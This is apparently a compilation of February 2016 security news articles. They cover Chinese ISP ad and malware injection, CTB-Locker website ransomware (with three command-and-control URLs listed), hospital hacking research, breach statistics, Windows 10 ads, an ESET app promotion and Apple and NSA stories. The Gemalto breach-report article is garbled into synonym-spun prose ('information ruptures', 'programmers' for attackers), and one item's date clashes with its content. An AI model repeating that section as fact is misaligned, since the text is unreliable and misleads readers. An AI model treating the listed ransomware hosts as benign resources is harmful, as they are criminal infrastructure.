Chinese ISPs Caught Injecting Ads and Malware into Web Pages
27.2.2016 Virus
China has gained a considerable global attention when it comes to their Internet policies in the past years; whether it's introducing its own search engine dubbed "Baidu," Great Firewall of China, its homebrew China Operating System (COP) and many more.
Along with the developments, China has long been criticized for suspected backdoors in its products: Xiaomi and Star N9500 smartphones are top examples.
Now, Chinese Internet Service Providers (ISPs) have been caught red-handed for injecting Advertisements as well as Malware through their network traffic.
Three Israeli researchers uncovered that the major Chinese-based ISPs named China Telecom and China Unicom, two of Asia's largest network operators, have been engaged in an illegal practice of content injection in network traffic.
Chinese ISPs had set up many proxy servers to pollute the client's network traffic not only with insignificant advertisements but also malware links, in some cases, inside the websites they visit.
If an Internet user tries to access a domain that resides under these Chinese ISPs, the forged packet redirects the user's browser to parse the rogue network routes. As a result, the client's legitimate traffic will be redirected to malicious sites/ads, benefiting the ISPs.
Here's How Malware and Ads are Injected
In the research paper titled 'Website-Targeted False Content Injection by Network Operators,' the Israeli researchers wrote that the tactic has now expanded to core ISPs – the Internet companies that interconnect edge ISPs with the rest of the ISPs globally.
These ISPs have set up specialized servers that monitor network traffic for specific URLs and move to alter it, no matter the end users are their customers or not.
Methods of Injection:
Various methods had been adopted by ISPs to infiltrate the legitimate traffic. Some of them are:
1- Out of Band TCP Injection
Unlike in the past when ISPs modified network packages to inject ads, the network operators send the forged packets without dropping the legitimate ones.
Interestingly, instead of interception or rewriting of network packets, cloning of HTTP response packets had been adopted by ISPs to replicate the infection. The ISP clones the legitimate traffic, modifies the clone, and then sends both packets to the desired destination.
So ultimately, there are 2 packet responses generated for a single request. Hence, there is a chance of forged packet to win the race, while legit packet reaches at last.
Since the cloned traffic will not always arrive at the end users before the legitimate one, the injected traffic is harder to detect.
But a serious analysis with netsniff-ng would knock out the fake packets.
2) HTTP Injection
HTTP is a stateless client-server protocol that uses TCP as its transport. As TCP only accepts the initial packet upon its receival and discards the second, there is a chance to receive the fake packet in first place; if infection had been taken place.
Here, the user might get a response with HTTP Status Number 302 (Redirection) instead of HTTP Status Number 200 (OK) and would be re-routed to the other non-legit links.
How to Identify Rogue Packets?
1) IP Identification
IP identification value does contains a counter that is sequentially incremented after each sent the packet.
The forged packet returns soon after making a request that masquerades as a legit packet. But the time stamp in each packet would provide enough evidence to eliminate the rogue packet.
The forged packet is the one that has the largest absolute difference between its identification value and the average of the identification values of all the other packets
2) TTL (Total Time to Live)
Each received packet contains an initial value set by sender that calculates the number of hops covered by the packet during the transmission.
If packet is received with different number of hop counts, then it would clearly draws a line between the legit and illegit ones.
The forged packet is the one that has the largest absolute difference between its TTL value and the average of TTL values of all the other packets
3) Timing Analysis
Time stamp in the packet captured by the monitoring systems at the entrance to the Edge network would figure out the genuinity.
The data packet with apparent time close proximity would differentiate the legitimate packets from the forged packets with unmatched arrival time.
List of the Infection Groups
 

In general, 14 different ISPs had been discovered with malicious background, and out of these 10 are from China, 2 from malaysia, and 1 each from India and United States.
Following are the injection groups and their characteristics:
1. Hao – Referred the user to hao123.com itself, but using an HTTP 302 response mechanism to infect users.
2. GPWA – The genuine website of Gambling had been forged to another web domain which intelligently redirects the traffic to 'qpwa' (sometimes, public would not find the difference between 'q' and 'g').
The forged content here includes a JavaScript that refers to a resource having the same name as the one originally requested by the user, but the forged resource is located at qpwa.org registered to a Romanian citizen.
3. Duba Group – The injections in this group add to the original content of a website a colorful button that prompts the victim to download an executable from a link at the domain duba.net.
The executable is flagged as malicious by several antivirus vendors.
4. Mi-img – In these injected sessions, the client, which appears to be an Android device, tries to download an application. The redirected response navigates into an online bot database that had been identified by a BotScout lookup.
5. Server Erased – In this group, the injections were identical to the legitimate response but the original value of the HTTP header 'Server' is changed.
Motive Behind the Attack
Both the advertising agencies and the ISPs are benefited by redirecting user's traffic to the corresponding sites.
This practice would mark an increase in advertisement revenue and other profits to advertisers and ISPs.
During their research, the researchers logged massive amounts of Web traffic and detected around 400 injection incidents based on this technique.
Most of these events happened with ISPs in China and far east countries, even if the traffic originated from Western countries, meaning a German user accessing a website hosted in China is also susceptible to having his/her traffic injected with ads or malware.
How to Mitigate?
Since the companies that engage in such practices are edge ISPs - the final network providers that connect users to the Internet, users can change their Internet provider.
However, the simplest way to combat this issue is for website operators to support HTTPS for their services, as all the websites that infect users are SSL-less.
The sites that supply malicious URLs are not guarded by SSL Shield, making them vulnerable to carry out the illegit things.
Therefore, usage of HTTPS-based websites would block such kinds of attacks, so users are advised only to stick to SSL sites.
Delivering the illegit content, or redirecting the crowd to stash the cash would end up losing the public trust on the technologies.


CTB-Locker Ransomware Spreading Rapidly, Infects Thousands of Web Servers
27.2.2016 Virus
In last few years, we saw an innumerable rise in ransomware threats ranging from Cryptowall to Locky ransomware discovered last week.
Now, another genre of ransomware had been branched out from the family of CTB-Locker Ransomware with an update to infect "Websites".
The newly transformed ransomware dubbed "CTB-Locker for Websites" exclusively hijacks the websites by locking out its data, which would only be decrypted after making a payment of 0.4 BTC.
This seems to be the very first time when any ransomware has actually defaced a website in an attempt to convince its administrator to comply with the ransom demand.
However, the infected website admins can unlock any 2 files by the random generator for free as a proof of decryption key works.
Here's How CTB-Locker for Websites Ransomware Works
The CTB-Locker ransomware replaces the index page (the original index.php or index.html) of the servers hosting websites with the attacker's defacement page (a new affected index.php).
The defacement page serves a message informing the site owners that their files have been encrypted, and they need to pay a ransom before a certain deadline.
Once encrypted, the compromised websites display the following message:
"Your scripts, documents, photos, databases and other important files have been encrypted with strongest encryption algorithm AES-256 and unique key, generated for this site."
The message also contains a step-by-step guide that helps the CTB-Locker victims to make the payment to a specific Bitcoin address.
FREE Key to Decrypt Any 2 Random Files
Soon after gaining the website control, the ransomware attacker submits two different AES-256 decryption keys to the affected index.php.
The first key would be used to decrypt any 2 random files from the locked files for free under the name of "test" which are chosen to demonstrate the decryption procedure.
Once the site administrator enters the filename and hit "Decrypt for Free," jquery would be fired up upon the request to test the decryption key in a C&C Server. When the key is received, it'll decrypt any 2 random files and display 'Congratulations! TEST FILES WAS DECRYPTED!!'
The other decryption key would be the one to decrypt rest of the seized files, after making the payment in Bitcoin to the attacker.
All the website's content would be encrypted using an AES-256 algorithm, and a unique ID would be generated for each infected website.
Nearly all possible types of files extensions are being affected by CTB-Locker Ransomware.
Live Session with Ransomware Attackers
Another unique characteristic of the ransomware is giving victims the ability to exchange messages with the ransomware attackers.
The ransomware developers have organized a chat room in such a way that the victims could talk with the ransomware creators after the specifying name of the secret file which is present in the same directory with index.php.
CTB Locker for Website → Modifies Packages in the Server
The CTB-Locker for Website package utilizes a variety of files described below:
index.php : The Main component of CTB-Locker for Websites and contains the encryption and decryption routines as well as the payment page.
allenc.txt : Contains a list of all encrypted files.
test.txt : Contains the path and filenames to two prechosen files that can be decrypted for free.
victims.txt : It contains a list of all files that are to be encrypted. However, the files that are already encrypted will remain in this list.
extensions.txt - The list of file extensions that should be encrypted.
secret_[site_specific_string] : The secret file used by the Free Decrypt and Chat functions and is located in the same folder as the index.php file.
Command and Control Server Location:
According to Benkow Wokned (@benkow_), a security researcher who discovered CTB-Locker for Website, found that the index.php page utilizes the jQuery.post() function to communicate and POST data to the Ransomware's Command and Control (C&C) servers.
Currently, there are three Command and Control servers for CTB-Locker for Websites uncovered by the researchers:
http://erdeni.ru/access.php
http://studiogreystar.com/access.php
http://a1hose.com/access.php
The ransomware also gives a timeslot for the website administrators to recover the files. However, failure to pay the BTC in time would double the ransom amount by 0.8 BTC.
CTB-Locker for Windows
CTB-Locker for Websites isn't the only latest development with this family of ransomware. The ransomware has come to the Windows environment by using executables code signed with a stolen certificate.
Usually, the purpose of digital signature is to authenticate the public about the genuinity of the products. The certificates are provided only after a background check conducted by the Certificate Authorities (CA) like Verizon, DigiCert.
But the cybercriminal group behind the CTB-Locker ransomware has tampered the genuinity of digital certificates. The executable version in the Windows of the CTB Ransomware comes with a pre-signed digital signature.
Uses Encryptor Raas For Code-Signing Certificate
The group behind CBT believed to had taken the advantage of Jeiphoos, another ransomware developer who lets people go to his "Encryptor RaaS" Tor site that provides free digital signature certificates and sign any executable using stolen code-signing certificate.
The act of stealing digital signatures is not new as they are included in the frames from the past years.
Hijacking a company website would economically affect the services that are being offered to users via websites, elevating the issue to another level. However, the major part lies in the POS (Point of Sale) attack, if the threat infects an e-commercial website.
Currently, many websites had been compromised by "CBT-Locker for Website." As per the analysis, many wordpress sites (most of the static web pages) has been found to be targeted by CBT Website Locker.
Since this is not a serious issue like the Locky ransomware that utilizes Macros, the website administrator can make use of the untouched mirrors (backups) to bring back the site into action.


Securing Hospitals from hackers that can put lives in dangers

27.2.2016 Hacking

Securing Hospitals is a report issued by Independent Security Evaluators that demonstrates how hackers can hack hospitals putting lives in danger.
A group of experts from the Independent Security Evaluators research team have tested the security of hospital networks, demonstrating how it is possible to gain access to critical medical equipment in attacks they say could put lives in danger.

The study was led by healthcare head Geoff Gentry, the results of the test conducted are reported in an interesting paper titled “Securing Hospitals.”

The experts demonstrated that such kind of cyber attacks could put lives in danger, for example hacking patient monitors is possible to display false information which could result in medical responses that injure or kill patients.

They security researchers examined 12 healthcare facilities, two data centres, two web applications, and a couple of live medical devices that could be hacked remotely by threat actors.

“The research results from our assessment of 12 healthcare facilities, 2 healthcare data facilities, 2 active medical devices from one manufacturer, and 2 web applications that remote adversaries can easily deploy attacks that target and compromise patient health. We demonstrated that a variety of deadly remote attacks were possible within these facilities, of which four attack scenarios are presented in this report. ” states the report.

The 71-page document is one of the most interesting study on the level of security of hospitals and the analysis of the resilience of medical devices to cyber attacks.

In the report is detailed a typical attack scenario where a foreign group could launch a cyber attack against the patients of the medical structure triggering vulnerabilities in passive medical devices.

The experts targeted an externally facing web server exploiting its vulnerabilities to gain control of the machine, once inside the network the attackers moved laterally searching for vulnerable devices to compromise.

“On a disconnected network segment, our team demonstrated an authentication bypass attack to gain access to the patient monitor in question, and instructed it to perform a variety of disruptive tasks, such as sounding false alarms, displaying incorrect patient vitals, and disabling the alarm,” the team says in the paper.

Securing Hospitals report - hacking hospitals medical devices

“This attack would have been possible against all medical devices … likely preventing assistance and resulting in the death or serious injury of patients.”

“The attack scenario is harrowing: Diligently executed, many human lives could be at stake, and extrapolating this problem to other hospitals is even more worrisome.”

Patient data could be easily stolen by attackers, attackers for example can exploit a cross-site scripting flaw inside a web application.

The experts dedicated a specific session of their test to cyber attacks relying on USB drives that could be used by hackers as bait. In one of the tests, the team of researchers dropped 18 infected sticks around hospitals, the malware present on the USB sticks allowed them to harvest information from terminals and establish a backdoor inside the systems.

In one case the attackers successfully breached the hospital drug dispensary service.

“At the time of this reporting, we are working to demonstrate that an attack against the particular dispensary is possible, meaning that anyone who can connect to the dispensary can then get access to the configuration interface and manipulate what the device believes it has to be its inventory. If this medication were then given to a patient, it would likely harm or kill the patient.” said the hackers.

The researchers also dedicated great attention to physical security, the team analyzed the presence of exposed hardware device ports and open computers operating in patient rooms, too easy to hack.

“The findings show an industry in turmoil: lack of executive support; insufficient talent; improper implementations of technology; outdated understanding of adversaries; lack of leadership, and a misguided reliance upon compliance,” states the report.

“[It] illustrates our greatest fear: patient health remains extremely vulnerable. One overarching finding of our research is that the industry focuses almost exclusively on the protection of patient health records, and rarely addresses threats to or the protection of patient health from a cyber threat perspective.”

The experts concluded that networks in the Hospitals are often insecure, in many cases the organizations lack of security policies and never audit their systems exposing patients to risk of cyber attacks.

“We found egregious business shortcomings in every hospital, including insufficient funding, insufficient staffing, insufficient training, lack of policy, lack of network awareness, and many more,” researcher Ted Harrington says. “These vulnerabilities are a result of systemic business failures.”

The findings demonstrate that patient health remains extremely vulnerable to cyber attack.


Gemalto Breach Level Index report 2015, what are hackers looking for?

27.2.2016 Hacking

2015 Gemalto Breach Level Index report confirmed the increased interest of threat actors in Government and healthcare data.
As per the security firm Gemalto, Government and healthcare have overwhelmed the retail area as most-focused for information breaks.

An aggregate of 1,673 information ruptures prompted 707 million information records being traded off worldwide amid 2015, as indicated by the most recent release of Gemalto Breach Level Index report.

Gemalto Breach Level Index report

Not all ruptures are just as genuine and the quantity of records revealed is stand out metric. The Gemalto Breach Level Index report endeavors to perceive this by appointing a seriousness score to every rupture (security breach) in view of elements including the sort of information and the quantity of records traded off, the wellspring of the break, and regardless of whether the information was encoded. The philosophy expects to recognize aggravations from high effect mega breaks.

More than 3.6 billion information records have been uncovered following 2013, when Gemalto started benchmarking freely unveiled information breaks. In 2015, vindictive outcasts (ie, programmers) were the main wellspring of these ruptures, representing 964, or 58 percent of breaks and 38 percent of records being compromised. Exposure or coincidental of data records represented 36 percent of all records.

According to the Gemalto Breach Level Index report, the quantity of state-supported assaults represented only 2% of the data breach incidents being reported, yet the quantity of records bargained as an aftereffect of those assaults made up 15 percent of all records uncovered.

The lopsided effect of a little number of breaks is halfway clarified by the high effect rupture at the United States Office of Personnel Management (OPM), which uncovered the individual points of interest of different government workers and released all way of “sensitive” data from historical verifications and related archives. Noxious insiders represented 14 percent of all the data ruptures and only 7% of the traded off (compromised) records.

Regarding geographic areas, 59 per cent reported break mishaps happened in the United States. Europe represented twelve percent of general rupture occurrences, trailed by the Asia Pacific locale at 8%.

Identity theft issue remained the essential kind of break, representing 53 per cent of the data ruptures and 40 percent of all records that were compromised.

Sector of Government represented 43 percent of the compromised/traded off information records, a five-fold increment more than 2014 because of a few substantial information ruptures in the United States and Turkey, and sixteen percent of all the information/data breaks. Healthcare area represented 19 percent of the aggregate records being compromised and 23 percent of all information/data breaks.

By complexity, the retail area saw the quantity of stolen information records dropping 93 per cent year-on-year, so it represented only six percent of stolen records and 10 percent of the aggregate number of ruptures in 2015.

This is in expansive part in light of the fact that 2014 was an especially unpleasant year for data information breaks in the retail division, with issues at Home Depot and others skewing numbers towards the stratosphere. The financial administrations segment likewise saw an almost 99 percent drop, speaking to only 0.1 per cent of the traded off/compromised data records and 15 percent of the aggregate number of ruptures.

They are not attempting to split your ledger – and that is terrible news for you

Criminal programmers in the course of the most recent year or so have moved their concentrate far from conventional card misrepresentation and towards taking individual data in the facilitation of the identity fraud/theft. This change is terrible news for both buyers and organizations alike, as indicated by Gemalto.

Chief technology officer for data protection and Vice President at Gemalto, Jason Hart said,

“In 2014, consumers may have been concerned about having their credit card numbers stolen, but there are built-in protections to limit the financial risks” . “However, in 2015 criminals shifted to attacks on personal information and identity theft, which are much harder to remediate once they are stolen.”

As organizations and gadgets gather continually expanding measures of client data and as purchasers’ online advanced exercises turn out to be more different and productive, more information about what they do, who they are and what they like is at danger to be stolen from the organizations that store their information.

He added, “If consumers’ entire personal data and identities are being co-opted again and again by cyber thieves, trust will increasingly become the centerpiece in the calculus of which companies they do business with”.

Breach-Level-Index-Infographic-2014-FINAL-v2


Ransomware attacks paralyzed at least two German hospitals
27.6.2016 Virus
New ransomware infections hit hospitals in Germany, at least two of them were infected by the dreaded malware.

According to local reports, the systems at two German hospitals were infected by a ransomware, in a similar way occurred recently at the US Hollywood Presbyterian Medical Center.

According to the German broadcaster Deutsche Welle, the German hospitals infected by the ransomware are the Lukas Hospital in the city of Neuss and the Klinikum Arnsberg hospital in North Rhine-Westphalia.

German hospitals infected by malware Lukas Hospital in the city of Neuss

“Several hospitals in Germany have come under attack by ransomware, a type of virus that locks files and demands cash to free data it maliciously encrypted. It will take weeks until all systems are up and running again.” reported the broadcaster.

A few weeks ago, the staff at the Lukas Hospital noticed a progressive deterioration of system performance, while error messages were popping up.

“We then pulled the plug on everything,” spokesperson Dr. Andreas Kremer told DW. “Computers, servers, even the email server, and we went offline.”

The ransomware paralyzed the hospital’s architecture, the incident occurred on February 10, 2016. The internal IT staff will take weeks until everything’s back to normal.

“Our IT department quickly realized that we caught malware that encrypts data. So if the X-ray system wants to access system data, it failed to find it because it’s been encrypted, so it displays an error message,” Kremer said.

The staff at the hospital used phone and fax to communicate with patients, the staff explained that a number of high-risk surgeries have been postponed because of the cyber attack.

The hospital reported the incident to the authorities and to the State Criminal Investigation Office (LKA) which are currently investigating on the case.

“We haven’t received a concrete demand for money, but we’ve seen these pop up windows that appear if you don’t stop the ransomware on a computer,” he told DW. The message in broken English points to an anonymous email address to get in touch with. “Following the Criminal Police Office’s advice, we didn’t do that,” Kremer said.

Fortunately, the IT staff at the hospital makes regular backups of the data.

“We have regular backups, so that isn’t a problem. If the virus encrypted data we have backed up, we just restore the backup files,” Kremer said.

The incident at Klinikum Arnsberg occurred a couple of days later, also in this case the systems were infected by a ransomware that was spread through phishing emails.

In this case, only one of 200 servers was infected by the malware, the IT staff recovered the situation by restoring a working backup.

“According to present knowledge, it was an attachment in an email that allowed the virus to enter the system,” Klinikum Arnsberg spokesperson Richard Bornkeßel told DW. “Fortunately, it was only one server that was affected. The virus had started to encrypt files, but we could simply restore them from a backup,”

Both German hospitals haven’t paid the ransom.


Windows 10 Started Showing Ads on LockScreen — Here's How to Turn It OFF
26.2.2016 OS
If you've upgraded your older version of Windows OS to an all new Windows 10 operating system then you may have noticed an advertisement appearing on your desktop or laptop’s lock screen over the past couple of days.
Yes, this is what Microsoft has chosen to generate revenue after offering Free Windows 10 Download to its users: Monetize the Lock Screen.
Thanks to Windows 10's new Spotlight feature that usually shows you clean and beautiful photographs and fun facts on your lock screen, but now started displaying advertisements to over 200 Million devices running Windows 10.
Some Windows 10 users have reported seeing ads for Rise of the Tomb Raider with links to Windows Store from where users can purchase the video game. Microsoft started selling the game last month.
Although the ads are not as annoying as the Windows 10 privacy concerns related to the way Microsoft collects your personal data, the good news is that you can turn the ads OFF.
Must Read: How to Stop Windows 7 or 8 from Downloading Windows 10 Automatically.
Here's How to Turn the Ads OFF
Disable Windows 10 Lock Screen Advertisement
The advertisements are because of the Windows Spotlight feature in your Personalization settings.
If you don't want to see these intrusive ads, follow the steps given below to disable Windows Spotlight:
Open the Start Menu and look for 'Lock Screen Settings.'
Under 'Background,' Choose either 'Picture' or 'Slideshow,' instead of Windows Spotlight.
Now, Scroll down to 'Get fun facts, tips, tricks, and more on your lock screen' and uncheck this box.
The advertisements are turned ON for your lock screen by default, which is definitely a clever way to offer companies to reach their customers, without mentioning the word 'advertisements' to the Windows users.
windows-10-settings
Also Read: If You Haven't yet, Turn Off Windows 10 Keylogger Now.
As I previously said: Nothing comes for Free, as "Free" is just a relative term. Everything comes with its own price.
As warned last year, Microsoft also started pushing Windows 10 upgrades onto its user's computers much harder by re-categorizing Windows 10 as a "Recommended Update" in Windows Update, instead of an "optional update."


How To Keep Your Android Phone Secure
26.2.2016 Android
As the number of threats is on the rise, Android platform is no longer safe, which isn't a surprise to anyone.
Most of us are usually worried more about the security of our desktops or laptops and forget to think about the consequences our smartphones can make if compromised or stolen.
Unlike desktops, your smartphones and tablets carry all sorts of information from your personal photographs, important emails, messages to your sensitive financial details. And due to rise in mobile usage, the hackers have shifted their interest from desktops to the mobile platform.
Nowadays, nearly all possible threats that were previously attacking desktop platform are now targeting smartphone users.
Ransomware, Phishing, Spams, Spyware, Botnets, Banking Malware, OS and Software vulnerabilities, just to name a few examples, but users don't understand the potential threat when it comes to mobile devices.
Additionally, your smartphones and tablets are also subjectable more threats like, Smartphone Thefts and unnecessary app permissions that allow even legitimate & reputed companies to spy on you.
However, there are a number of solutions to solve all the above issues, but for that, you generally need to install multiple cumbersome and untrusted applications to your mobile devices.
Like a good antivirus to resolve malware and virus issues, an app to manage Android app permissions, a device tracking application in case your device is lost or stolen and lots more and installing all these apps consume lots of space, RAM, the battery of your device.
I frequently receive these types of queries from my readers who ask me for some good solution that could solve most of the security and privacy issues in one go.
So I headed to Google Play Store and started searching for an app that offers a full suite of security and privacy tools. I came across some reputed apps, but they resolve few issues and some apps that address several issues but originate from some vendor I can’t trust.
Then I came across , which comes from one of the reputed antivirus vendors, that is offering protection for all the threats we discussed above.
Anti-Virus Feature with 99.9% Detection Rate
best-mobile-antivirus-app
As its primary role, ESET offers the best antivirus scanning for your smartphone devices with up-to-date threat database and clean mobile app interface.
According to the latest test and review conducted by AV-TEST, an independent lab, ESET mobile security antivirus detects 99.9% of latest threats with the protection and usability score 6 out of 6.
After installing and registering my account, the app's Anti-Virus feature offered me options to have my smartphone scanned periodically:
At specific times, when I’m not using my phone, or
When I plugged in my smartphone for charging
Moving further, I found 3 different levels of scanning available in the software: Quick Scan, Smart Scan, and Deep Scan. So, one can choose to perform any of the options one's feel suitable. I chose Deep Scan that scanned every data and files available on my phone.
ESET Mobile Security also allows to access scan logs easily, and one can also have a look at quarantined items (suspicious files or malware) detected by the anti-virus.
Moreover, the anti-virus feature is also offering a series of advanced antivirus options, including support for ESET Live Grid, detection of potentially unwanted or harmful applications and real-time protection.
Anti-Theft (Remote Lock / Remote Wipe / Locate)
android-anti-theft-app
It is always unfortunate when our expensive mobile device is lost or stolen. Many apps in the market offer device recovery feature via GPS-based tracking, but many times these apps are unable to locate the device. Even if an attacker somehow gets access to the device, it is easy for him/her to uninstall the tracking app.
But, I liked the way works. It is designed to help you easily track your lost or stolen device, and password protects your app so that no one can uninstall it, except you.
All you need to do is:
Set a trusted SIM card within the app.
Provide a trusted number in case of emergency
In the case of lost or stolen, you can log into your ESET account at my.eset.com and track your devices through an easy-to-use web interface and ensure that all your data remains protected from unauthorized users.
As soon as you mark your device as 'Missing' on the online portal, the location of your stolen or lost device will be displayed on a real-time map so that you can easily trace it. You can even view a list of IP addresses that your lost device was connected to.
Bonus — 'Selfies' of Phone Thieves: Marked as Missing devices will automatically capture photographs with its back and front cameras, and then send them to the online portal, which helps you find the location of a missing device easier.
But, What if your stolen device is not connected to the Internet?
Here's How you can Protect Your Smartphone:
Like other apps, ESET Anti-Theft feature lets you send an SMS message command from a trusted number to remotely lock or erase your smartphone data immediately, as well as ringing it in case it has been lost somewhere nearby.
On the top of that, ESET Anti-Theft functionality provides a series of new features, like even if an unauthorized SIM card has been inserted in your stolen smartphone, you can send remote commands to it.
Even if someone tries a wrong PIN or pattern on your smartphone, or insert an unauthorized SIM, your device will be able to take preventive actions on its own in an effort to ensure that your data remains protected.
Device Monitoring and Application Audit:
android-security-app
These features are something that most of us ignore while searching for a good mobile security solution.
Today many apps, even legitimate, request for unnecessary app permissions. Some of your apps can make phone calls, track your location, read your browsing history, contacts, SMS, photos and calendar, and even share this data with third-party advertising companies without your knowledge.
And since I'm security conscious, I always make sure which app is requesting what permissions and for this I found ESET Mobile Security best fit for me.
ESET Mobile Security offers 'Application Audit' feature to help you know what permissions various apps installed on your smartphone or tablet have.
You can click on any app listed in the Application Audit interface, which will land you to your smartphone’s settings menu, from where you can easily restrict unnecessary app permissions or even uninstall it.
Besides this, the app offers you 'Device Monitoring' feature that will help you inform any necessary settings you haven't set correct that could compromise your security.
Anti-Phishing and SMS/MMS/Call Blocker
android-anti-phishing-app
Phishing emails, messages and even contacts are common these days. Hackers or malicious attackers can trick you handing over your sensitive accounts like banking, email or social media accounts access to them.
So, it has become important for us to keep an eye on every email and message that we receive every day, but it’s not as easy as it sounds.
This app resolves the above hurdle as well. ESET's Anti-Phishing feature offers an additional level of protection when you browse the web from your smartphone or tablet.
Though the app doesn't support all browsers currently, you can choose the one that is present on the list of supported browsers to navigate the web.
Besides all the above tools, ESET Mobile Security also offers text messages (SMS), and multimedia messages (MMS) and phone calls blocking capabilities to Android users.
So you can easily opt to simply block calls and messages from all unknown numbers, or more interestingly, all or specific known numbers — with options for both incoming and outgoing blocks.
android-antivirus-security-app
In short, I found ESET Mobile Security a package of security and privacy tools bundled into a single app.
The app is fast, provides a user-friendly interface, keeps you safe from malware, protects against phishing attacks, with numerous other tools to keep your smartphone safe even when it's out of your hands.
However, ESET Mobile Security app doesn't provide any Encrypted Cloud-based Backups, device encryption, which I will like to see in-built in the future.
Overall, ESET Mobile Security for Android is a solid choice for protecting your smartphone or tablet with its top-notch malware protection and huge array of anti-theft and privacy-protection features.
You can download and install app for FREE for a lifetime from the Google Play Store if you are seeking for basic protection capabilities.
However, those seeking for Advanced security and privacy protection on their smartphones should upgrade to a premium subscription, via in-app purchase.


Apple hires developer of World's Most Secure Messaging App
26.2.2016 Apple
Apple is serious this time to enhance its iPhone security that even it can not hack. To achieve this the company has hired one of the key developers of Signal — World's most secure, open source and encrypted messaging app.
Frederic Jacobs, who worked to develop Signal, announced today that he is joining Apple this summer to work as an intern in its CoreOS security team.
"I'm delighted to announce that I accepted an offer to be working with the CoreOS security team at Apple this summer," Jacobs tweeted Thursday.
Signal app is widely popular among the high-profile privacy advocates, security researchers, journalists and whistleblowers for its clean and open source code, and even the NSA whistleblower Edward Snowden uses it every day.
Signal messages are end-to-end encrypted, which means only the sender and the intended recipient can read the messages. Although Apple's iMessage is also end-to-end encrypted, it is not open source.
Apple to build 'Unhackable' Services
The reason behind the Apple's hiring is quite clear as the company is currently fighting a US court order asking Apple to help the FBI unlock iPhone 5C of San Bernardino shooter Syed Farook.
Basically, Apple is deliberately forced to create the special, backdoored version of iOS, so that the Federal Bureau of Investigation (FBI) may be able to Brute Force the passcode on Farook's iPhone without losing the data stored in it.
However, Apple CEO Tim Cook has already refused to provide such a backdoor into the iPhone that would degrade the privacy and security of all iPhone users.
If comply with the court order, the company would be flooded by the FBI and the CIA requests to unlock more iPhones of criminals in near future and the recent request made by the United States government to unlock 12 more iPhones would be just a starter.
But, in an effort to eliminate the chance for government and intelligence agencies for demanding backdoors, the company is removing its own ability to do that, for which they are hiring new interns in its core security team.
Apple found Jacobs a good fit for this, as he had spent two and half years with Open Whisper Systems, the company behind Signal, before leaving the company earlier this year.
Apple to Fully Encrypt iCloud Backups
In San Bernardino shooter's case, Apple admitted that it helped the FBI in every possible way by providing iCloud Backup of Farook, but now…
Apple is working on encrypting iCloud backups that only the account owner would have access, eliminating either way for the government or hackers that could expose its users data.
While creating iCloud backups of users' photos, videos, app data, iMessage, voicemails, SMS, and MMS messages, Apple stores a copy of its users' decryption keys itself that could be provided to authorities when presented with a valid warrant.
But citing some anonymous sources, the Financial Times reports that now Apple will not keep a copy of user's decryption key with it, and the encrypted iCloud backups would only be unlocked by the account holder using her/his passcode.


Discover how many ways there were to hack your Apple TV
26.2.2016 Apple

Apple has patched more than 60 vulnerabilities affecting the Apple TV, including flaws that can lead to arbitrary code execution and information disclosure.
IoT devices are enlarging our attack surface, we are surrounded by devices that manage a huge quantity of information and that could be abused by hackers.

Apple has patched more than 60 vulnerabilities affecting the Apple TV, including flaws that can lead to arbitrary code execution, information disclosure, crash of the application, modifications to protect parts of the filesystem.

This new release of Apple TV version 7.2.1, comes 10 months after the lasted update issued in April 2015. The new version fixes a number of security vulnerabilities in several components of the Apple TV. The company has patched 33 issued, collectively referenced in 58 CVEs, Apple fixed 19 code execution holes that could be exploited with crafted web content.

The changes will be automatically applied to the users that have enabled the automatic updates.

Apple TV hacking

The experts at Apple solved serious security issued residing in the WebKit, the kernel, the third-party app sandbox, Office Viewer, IOKit, ImageIO, FontParser, DiskImages, bootp, CloudKit, and other libraries.

A close look at the list of security holes reveals the presence of a memory corruption flaw (CVE-2015-5776) that could be exploited to by a remote attacker to gain arbitrary code execution or crash applications. Other security vulnerabilities could be triggered by attackers using malicious or malformed DMG files, plists, and apps.

The new release included a series of fixes that Apple has released over the time for other products, the company is spending a significant effort to design a new generation of devices with improved security and that meets strict requirements in term of security.

Recently the company refused to hack into the San Bernardino shooter’s iPhone, and while the dispute with the FBI is going on, it has been reported that Apple is working on a new model that will be impossible to hack.


Wikileaks – NSA tapped world leaders for US geopolitical Interests
26.2.2016 BigBrothers

The NSA tapped world leaders for US Geopolitical Interests, including a conversation between Netanyahu-Berlusconi over the U.S.-Israel Relations.
A couple of days ago the non-profit journalistic organisation WikiLeaks published a collection of highly classified documents that reveals the NSA targeted world leaders for US Geopolitical Interests.

Some of the intercepts are classified TOP-SECRET COMINT-GAMMA, these are most highly classified documents ever published by a media organization.

In particular, one of the documents, reports eavesdropping activities conducted by the US intelligence that spied on the communication between the German Chancellor Angela Merkel and UN Secretary-General Ban Ki-moon on climate change negotiations.

The agents of the National Security Agency have bugged a private climate change strategy meeting between the two politicians held in Berlin.

In June 2015, Wikileaks released another collection of documents on the extended economic espionage activity conducted by the NSA in Germany. The cyber the spies were particularly interested in the Greek debt crisis. The US intelligence targeted German government representatives due to their privileged position in the negotiations between Greece and the UE.

Julian Assange, editor-in-chief at Wikileaks, released the following declaration on Wednesday:

“[it] further demonstrates that the United States’ economic espionage campaign extends to Germany and to key European institutions and issues such as the European Central Bank and the crisis in Greece.” “Would France and Germany have proceeded with the BRICS bailout plan for Greece if this intelligence was not collected and passed to the United States – who must have been horrified at the geopolitical implications?”

wikileaks NSA
The new lot of classified documents also revealed that espionage on the Chief of Staff of UN High Commissioner for Refugees (UNHCR), an activity that was conducted by the US intelligence for a for a long time, the spies intercepted targeting his Swiss phone.

Under the control of the US intelligence there was also the Director of the Rules Division of the World Trade Organisation (WTO), Johann Human, but most interesting cables for the Italian Government are related the espionage of the Prime Minister Silvio Berlusconi.

The interceptions were conducted by the Special Collection Service (SCS), a team of cyber spies operating under diplomatic cover in US embassies and consulates around the world. “Back in 2013, thanks to a Snowden document dated 2010, l’Espresso and la Repubblica revealed how Italy was the only European country, along with Germany, to have two Scs teams on its territory: one in Rome and the other in Milan.

” reported an article published by the Italian L’Espresso.

The documents leaked by Wikileaks confirmed that in March 2010 the US Government has intercepted communications between Italian Prime Minister and the Israeli PM Netanyahu, information disclosed reveals that Berlusconi promised to assist in helping Israel in mending the damaged relationship with the U.S..

The crisis between the United States and Israel was triggered by the announcement of Netanyahu’s plans to build 1,600 houses in East Jerusalem. Berlusconi offered its support to Israel in helping mend the situation.

